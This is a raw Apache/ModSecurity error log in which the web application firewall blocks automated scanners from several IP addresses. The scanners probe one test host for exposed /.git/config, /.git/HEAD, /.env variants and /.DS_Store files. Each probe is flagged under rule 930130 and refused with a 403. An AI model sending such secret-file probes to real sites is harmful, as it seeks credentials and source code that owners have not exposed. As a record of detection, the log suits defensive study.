[Sat Aug 02 23:31:47.145738 2025] [:error] [pid 1640659] [client 198.199.122.193:38088] [client 198.199.122.193] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aI6Dw9ACcGA774h0txizfwAAAAQ"]
[Sat Aug 02 23:31:47.148192 2025] [:error] [pid 1640659] [client 198.199.122.193:38088] [client 198.199.122.193] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aI6Dw9ACcGA774h0txizfwAAAAQ"]
[Sat Aug 02 23:31:47.148374 2025] [:error] [pid 1640659] [client 198.199.122.193:38088] [client 198.199.122.193] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aI6Dw9ACcGA774h0txizfwAAAAQ"]
[Thu Aug 07 07:12:49.698766 2025] [:error] [pid 1766593] [client 195.178.110.161:57462] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJQ10TY2OWLNlsLa7fg7TwAAAAY"]
[Thu Aug 07 07:12:49.701578 2025] [:error] [pid 1766593] [client 195.178.110.161:57462] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJQ10TY2OWLNlsLa7fg7TwAAAAY"]
[Thu Aug 07 07:12:49.701755 2025] [:error] [pid 1766593] [client 195.178.110.161:57462] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJQ10TY2OWLNlsLa7fg7TwAAAAY"]
[Thu Aug 07 07:12:49.881123 2025] [:error] [pid 1766365] [client 195.178.110.161:57464] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aJQ10dw9-z__p54pB95ybwAAAAM"]
[Thu Aug 07 07:12:49.881977 2025] [:error] [pid 1766365] [client 195.178.110.161:57464] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aJQ10dw9-z__p54pB95ybwAAAAM"]
[Thu Aug 07 07:12:49.882194 2025] [:error] [pid 1766365] [client 195.178.110.161:57464] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aJQ10dw9-z__p54pB95ybwAAAAM"]
[Thu Aug 07 07:12:50.113736 2025] [:error] [pid 1766363] [client 195.178.110.161:57466] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aJQ10ocCsfereOvSh4WjQwAAAAE"]
[Thu Aug 07 07:12:50.114027 2025] [:error] [pid 1766363] [client 195.178.110.161:57466] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aJQ10ocCsfereOvSh4WjQwAAAAE"]
[Thu Aug 07 07:12:50.114215 2025] [:error] [pid 1766363] [client 195.178.110.161:57466] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aJQ10ocCsfereOvSh4WjQwAAAAE"]
[Thu Aug 07 07:12:50.331428 2025] [:error] [pid 1766366] [client 195.178.110.161:57478] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aJQ10nXQDkxLEYSnLHhxtgAAAAQ"]
[Thu Aug 07 07:12:50.331683 2025] [:error] [pid 1766366] [client 195.178.110.161:57478] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aJQ10nXQDkxLEYSnLHhxtgAAAAQ"]
[Thu Aug 07 07:12:50.331850 2025] [:error] [pid 1766366] [client 195.178.110.161:57478] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aJQ10nXQDkxLEYSnLHhxtgAAAAQ"]
[Thu Aug 07 07:12:50.584359 2025] [authz_core:error] [pid 1767180] [client 195.178.110.161:57482] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Thu Aug 07 07:12:55.662493 2025] [:error] [pid 1767297] [client 195.178.110.161:57496] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aJQ114R3-TEbQTNwQUoiQQAAAAg"]
[Thu Aug 07 07:12:55.662881 2025] [:error] [pid 1767297] [client 195.178.110.161:57496] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aJQ114R3-TEbQTNwQUoiQQAAAAg"]
[Thu Aug 07 07:12:55.663235 2025] [:error] [pid 1767297] [client 195.178.110.161:57496] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aJQ114R3-TEbQTNwQUoiQQAAAAg"]
[Thu Aug 07 07:12:57.062858 2025] [:error] [pid 1766365] [client 195.178.110.161:57540] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aJQ12dw9-z__p54pB95ycAAAAAM"]
[Thu Aug 07 07:12:57.063123 2025] [:error] [pid 1766365] [client 195.178.110.161:57540] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aJQ12dw9-z__p54pB95ycAAAAAM"]
[Thu Aug 07 07:12:57.063312 2025] [:error] [pid 1766365] [client 195.178.110.161:57540] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aJQ12dw9-z__p54pB95ycAAAAAM"]
[Thu Aug 07 07:13:02.149052 2025] [:error] [pid 1766363] [client 195.178.110.161:52510] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aJQ13ocCsfereOvSh4WjRAAAAAE"]
[Thu Aug 07 07:13:02.149306 2025] [:error] [pid 1766363] [client 195.178.110.161:52510] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aJQ13ocCsfereOvSh4WjRAAAAAE"]
[Thu Aug 07 07:13:02.149505 2025] [:error] [pid 1766363] [client 195.178.110.161:52510] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aJQ13ocCsfereOvSh4WjRAAAAAE"]
[Thu Aug 07 07:13:08.378545 2025] [:error] [pid 1766366] [client 195.178.110.161:32982] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aJQ15HXQDkxLEYSnLHhxtwAAAAQ"]
[Thu Aug 07 07:13:08.378796 2025] [:error] [pid 1766366] [client 195.178.110.161:32982] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aJQ15HXQDkxLEYSnLHhxtwAAAAQ"]
[Thu Aug 07 07:13:08.378945 2025] [:error] [pid 1766366] [client 195.178.110.161:32982] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aJQ15HXQDkxLEYSnLHhxtwAAAAQ"]
[Sun Aug 10 08:00:31.631538 2025] [:error] [pid 1839638] [client 31.220.40.210:58466] [client 31.220.40.210] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aJg1f_HUtt14rZPG6oM-4QAAAAQ"]
[Sun Aug 10 08:00:31.633377 2025] [:error] [pid 1839638] [client 31.220.40.210:58466] [client 31.220.40.210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aJg1f_HUtt14rZPG6oM-4QAAAAQ"]
[Sun Aug 10 08:00:31.633633 2025] [:error] [pid 1839638] [client 31.220.40.210:58466] [client 31.220.40.210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aJg1f_HUtt14rZPG6oM-4QAAAAQ"]
[Mon Aug 11 18:50:08.529034 2025] [:error] [pid 1876153] [client 195.178.110.75:47082] [client 195.178.110.75] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aJofQMmx4Op1e3lrob_2mQAAABE"], referer: http://autumnus.test.indacotrentino.com/.DS_Store
[Mon Aug 11 18:50:08.530534 2025] [:error] [pid 1876153] [client 195.178.110.75:47082] [client 195.178.110.75] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aJofQMmx4Op1e3lrob_2mQAAABE"], referer: http://autumnus.test.indacotrentino.com/.DS_Store
[Mon Aug 11 18:50:08.530743 2025] [:error] [pid 1876153] [client 195.178.110.75:47082] [client 195.178.110.75] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aJofQMmx4Op1e3lrob_2mQAAABE"], referer: http://autumnus.test.indacotrentino.com/.DS_Store
[Tue Aug 12 14:07:42.378680 2025] [:error] [pid 1898594] [client 216.81.248.153:54506] [client 216.81.248.153] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aJsujqtLnEFFpEMLhCE2vAAAAAg"]
[Tue Aug 12 14:07:42.379027 2025] [:error] [pid 1898594] [client 216.81.248.153:54506] [client 216.81.248.153] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aJsujqtLnEFFpEMLhCE2vAAAAAg"]
[Tue Aug 12 14:07:42.379271 2025] [:error] [pid 1898594] [client 216.81.248.153:54506] [client 216.81.248.153] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aJsujqtLnEFFpEMLhCE2vAAAAAg"]
[Sat Aug 16 10:47:42.941863 2025] [:error] [pid 1991111] [client 45.130.203.133:40083] [client 45.130.203.133] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aKBFrviePLW9Fmf_kHONwgAAAAA"]
[Sat Aug 16 10:47:42.943644 2025] [:error] [pid 1991111] [client 45.130.203.133:40083] [client 45.130.203.133] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aKBFrviePLW9Fmf_kHONwgAAAAA"]
[Sat Aug 16 10:47:42.943801 2025] [:error] [pid 1991111] [client 45.130.203.133:40083] [client 45.130.203.133] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aKBFrviePLW9Fmf_kHONwgAAAAA"]
[Fri Aug 22 15:42:41.605000 2025] [:error] [pid 2140012] [client 216.81.248.73:42728] [client 216.81.248.73] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aKhz0e98q-eNzPzozA4h5gAAAAI"]
